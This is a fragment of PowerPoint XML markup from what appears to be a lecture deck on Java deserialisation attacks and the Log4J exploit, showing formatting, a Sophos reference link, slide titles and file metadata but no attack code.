            <a:ext cx="8555037" cy="5803900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2E7FDA3-7B79-CC3C-8FAC-2F3460D08E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541338">
              <a:lnSpc>
                <a:spcPct val="116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 marL="817563" indent="-314325" defTabSz="541338">
              <a:lnSpc>
                <a:spcPct val="116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 marL="1258888" indent="-250825" defTabSz="541338">
              <a:lnSpc>
                <a:spcPct val="116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 marL="1763713" indent="-250825" defTabSz="541338">
              <a:lnSpc>
                <a:spcPct val="116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 marL="2266950" indent="-250825" defTabSz="541338">
              <a:lnSpc>
                <a:spcPct val="116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7241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31813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6385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4095750" indent="-250825" defTabSz="541338" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="11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 typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{A54E663E-8669-4353-BCC1-86308E23D0AC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="96261" name="Afbeelding 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{667BA64E-FFC3-B4C3-377E-E8A16C10C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1398588"/>
            <a:ext cx="8823325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20134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2125" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
          <a:lnSpc>
            <a:spcPct val="11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Comic Sans MS" pitchFamily="6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2125" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
          <a:lnSpc>
            <a:spcPct val="11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Comic Sans MS" pitchFamily="6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3958</TotalTime>
  <Words>587</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>104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Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>(De)serialisation  </vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Deserialisation attacks in Java</vt:lpstr>
      <vt:lpstr>Log4J attack</vt:lpstr>
      <vt:lpstr>JNDI (Java Naming and Directory Interface)</vt:lpstr>
      <vt:lpstr>The Log4J attack</vt:lpstr>
      <vt:lpstr>Example data exfiltration using Log4J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 Poll</dc:creator>
  <cp:lastModifiedBy>Poll, E. (Erik)</cp:lastModifiedBy>
  <cp:revision>276</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-03-17T10:19:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-14T17:57:42Z</dcterms:modified>
</cp:coreProperties>
</file>